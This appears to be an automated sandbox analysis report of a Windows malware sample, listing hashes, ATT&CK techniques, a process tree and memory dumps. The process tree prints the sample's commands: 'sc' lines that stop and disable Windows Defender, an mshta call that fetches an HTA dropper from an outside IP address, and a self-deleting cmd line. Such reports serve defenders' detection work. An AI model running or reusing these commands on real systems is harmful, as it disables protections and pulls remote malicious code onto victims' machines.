Overview

overview

10

Static

static

3

27891f9767...18.exe

windows7-x64

10

27891f9767...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240704-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/07/2024, 06:21

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    27891f97676249d11cf7cce5af1d6466_JaffaCakes118.exe

  • Size

    2.3MB

  • MD5

    27891f97676249d11cf7cce5af1d6466

  • SHA1

    0d6b9138acdb589e945eb659604e828b6e613c67

  • SHA256

    67d02e82efdc1032b8bf7231fd4ab8a21b161229f531c39b501e1877beceb09e

  • SHA512

    c39fcc696c73ee7d72f21af34919512825734fc996fb60570475df3693509bc27d76a764f01cfc33e9857b33a7c4d249d4ad9d27ab51e289abee9731dab203b6

  • SSDEEP

    49152:e5FHC2MmVOlOoqvH6rp1NcUczjRO4Ye47YfW5I5GWMo/4aHRNpoRxjt:dWVuVqf6V1NcUczjfBGeF/4aHRNpoLt

Score
10/10
evasionexecutionpersistence

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://78.26.187.108/soft-usage/favicon.ico?0=1200&1=DJVPRFTV&2=i-s&3=106&4=9200&5=6&6=2&7=919041&8=1033

Signatures

  • Disables service(s) 3 TTPs
    evasionexecution
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Blocklisted process makes network request 1 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 20 IoCs
    persistence
  • Stops running service(s) 4 TTPs
    evasionexecution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\27891f97676249d11cf7cce5af1d6466_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\27891f97676249d11cf7cce5af1d6466_JaffaCakes118.exe"
    1⤵
    • Event Triggered Execution: Image File Execution Options Injection
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1356
    • C:\Windows\SysWOW64\sc.exe
      sc stop WinDefend
      2⤵
      • Launches sc.exe
      PID:1176
    • C:\Windows\SysWOW64\sc.exe
      sc config WinDefend start= disabled
      2⤵
      • Launches sc.exe
      PID:2988
    • C:\Users\Admin\AppData\Roaming\fvwusu.exe
      C:\Users\Admin\AppData\Roaming\fvwusu.exe
      2⤵
      • Modifies WinLogon for persistence
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2660
      • C:\Windows\SysWOW64\sc.exe
        sc stop WinDefend
        3⤵
        • Launches sc.exe
        PID:2604
      • C:\Windows\SysWOW64\sc.exe
        sc config WinDefend start= disabled
        3⤵
        • Launches sc.exe
        PID:2004
      • C:\Windows\SysWOW64\mshta.exe
        mshta.exe "http://78.26.187.108/soft-usage/favicon.ico?0=1200&1=DJVPRFTV&2=i-s&3=106&4=9200&5=6&6=2&7=919041&8=1033"
        3⤵
        • Blocklisted process makes network request
        PID:1752
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\27891F~1.EXE" >> NUL
      2⤵
        PID:636

    Network

    MITRE ATT&CK Enterprise v15

    Reconnaissance

    Resource Development

    Initial Access

    Execution

    System Services

    2
    T1569

    Service Execution

    2
    T1569.002

    Persistence

    Boot or Logon Autostart Execution

    1
    T1547

    Winlogon Helper DLL

    1
    T1547.004

    Create or Modify System Process

    2
    T1543

    Windows Service

    2
    T1543.003

    Event Triggered Execution

    1
    T1546

    Image File Execution Options Injection

    1
    T1546.012

    Privilege Escalation

    Boot or Logon Autostart Execution

    1
    T1547

    Winlogon Helper DLL

    1
    T1547.004

    Create or Modify System Process

    2
    T1543

    Windows Service

    2
    T1543.003

    Event Triggered Execution

    1
    T1546

    Image File Execution Options Injection

    1
    T1546.012

    Defense Evasion

    Impair Defenses

    1
    T1562

    Modify Registry

    1
    T1112

    Credential Access

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Lateral Movement

    Collection

    Command and Control

    Exfiltration

    Impact

    Service Stop

    2
    T1489

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\fvwusu.exe
      Filesize

      2.3MB

      MD5

      27891f97676249d11cf7cce5af1d6466

      SHA1

      0d6b9138acdb589e945eb659604e828b6e613c67

      SHA256

      67d02e82efdc1032b8bf7231fd4ab8a21b161229f531c39b501e1877beceb09e

      SHA512

      c39fcc696c73ee7d72f21af34919512825734fc996fb60570475df3693509bc27d76a764f01cfc33e9857b33a7c4d249d4ad9d27ab51e289abee9731dab203b6

      Download Submit

    • memory/1356-28-0x00000000028C0000-0x00000000028C1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-10-0x00000000036C0000-0x00000000036C1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-8-0x0000000002690000-0x0000000002691000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-7-0x0000000002670000-0x0000000002671000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-6-0x0000000002680000-0x0000000002681000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-5-0x0000000002640000-0x0000000002641000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-4-0x0000000000990000-0x0000000000991000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-3-0x00000000009A0000-0x00000000009A1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-2-0x00000000009B0000-0x00000000009B1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-27-0x0000000002870000-0x0000000002871000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-0-0x0000000000400000-0x0000000000886000-memory.dmp

      Filesize

      4.5MB

      Download

    • memory/1356-17-0x00000000036C0000-0x00000000036C1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-39-0x00000000036B0000-0x00000000036B1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-38-0x0000000002890000-0x0000000002891000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-37-0x00000000036B0000-0x00000000036B1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-36-0x00000000036C0000-0x00000000036C1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-35-0x0000000002930000-0x0000000002931000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-34-0x00000000036C0000-0x00000000036C1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-33-0x0000000002920000-0x0000000002921000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-32-0x00000000028E0000-0x00000000028E1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-31-0x00000000028F0000-0x00000000028F1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-30-0x0000000002900000-0x0000000002901000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-9-0x00000000036C0000-0x00000000036C1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-29-0x00000000036B0000-0x00000000036B1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-11-0x0000000002650000-0x0000000002651000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-26-0x00000000028A0000-0x00000000028A1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-25-0x0000000002830000-0x0000000002831000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-24-0x0000000002840000-0x0000000002841000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-23-0x0000000002850000-0x0000000002851000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-22-0x00000000036B0000-0x00000000036B1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-21-0x00000000036B0000-0x00000000036B1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-20-0x00000000036B0000-0x00000000036B1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-19-0x00000000036B0000-0x00000000036B1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-18-0x00000000036C0000-0x00000000036C1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-16-0x00000000036C0000-0x00000000036C1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-15-0x00000000036C0000-0x00000000036C1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-14-0x00000000036C0000-0x00000000036C1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-13-0x00000000036C0000-0x00000000036C1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-12-0x00000000036C0000-0x00000000036C1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-40-0x00000000036B0000-0x00000000036B2000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1356-43-0x0000000000980000-0x0000000000981000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-41-0x00000000036A0000-0x00000000036A2000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1356-42-0x0000000000970000-0x0000000000971000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1356-1-0x00000000026D0000-0x000000000272A000-memory.dmp

      Filesize

      360KB

      Download

    • memory/1356-50-0x00000000026D0000-0x000000000272A000-memory.dmp

      Filesize

      360KB

      Download

    • memory/1356-51-0x0000000000400000-0x0000000000886000-memory.dmp

      Filesize

      4.5MB

      Download

    • memory/2660-48-0x0000000000400000-0x0000000000886000-memory.dmp

      Filesize

      4.5MB

      Download

    • memory/2660-52-0x0000000000400000-0x0000000000886000-memory.dmp

      Filesize

      4.5MB

      Download